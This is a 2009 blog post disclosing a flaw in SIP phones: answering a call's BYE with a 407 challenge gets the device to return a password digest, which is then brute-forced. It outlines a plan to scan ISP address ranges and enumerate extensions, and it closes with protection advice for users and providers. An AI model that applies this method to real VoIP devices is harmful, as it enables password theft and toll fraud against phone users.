Get the password from ANY SIP device?!?! It is fully possible!
March 26, 2009
Posted by on
If I know the IP address of your SIP User-Agent and your extension, I can get your password. Not true? Here is how Sandro and I did it! Sandro Gauci also has a tool (voippack for Canvas) which automates the whole process, you can watch the video here!
The fault is that a User-Agent actually answers on an authorization request, even though there is no reason for it. We first send an INVITE, the user-agent rings and the user picks up the phone. When the user hangs-up, we reply the BYE message with an authorization request, which the User-Agent normally answers with a SIP Digest (with the encrypted password). We brute force this digest.
The master plan:
- Check up on the Internet which ISPs are delivering VoIP. Check RIPE for their IP ranges. Scan them for SIP devices.
- Get the extensions they are using (or their ranges of usernames (e.g phone numbers, then do brute force on these ranges on each IP)
- Send an INVITE to the correct extension and the phone will ring. When the user hangs-up, we have the password.
We make the phone send a PROXY AUTHENTICATION when the SIP UserAgent sends the BYE message. We answer with “407 Proxy authorization required” and then the SIP UserAgent actually answers this with the password in a MD5 hash.
- The SIP stack is not connected to the IP Stack. Why is the SIP User Agent answering on SIP messages from other IPS than the SIP Registrar it is connected to? There should be automatically a rule saying “all SIP messages from other servers than what I’ve registered to = drop them!”
- Why does the User Agent blindly answer a challenge on the BYE message. Just send it a “407” and the SIP UA answers with the password…
Units tested (and we managed to get the password)
The units that will be tested further:
- Thompson ST2030
How to protect yourself (for users)
- Make sure your VoIP provider has credit limits! You don’t want to get a huge phone bill!
- Report any unusual phone calls or strange behavior!
How to protect yourself (for VoIP providers)
- Protect your SIP user-agents! This is hard with the Fritz units
which is normally used as a router
- Have very long SIP passwords and use all characters that is possible! (#¤%” and others)
- Change the SIP password regularly
- Run VoIP honeypots to detect scans in your area
How serious do you think this is? Write your comments now!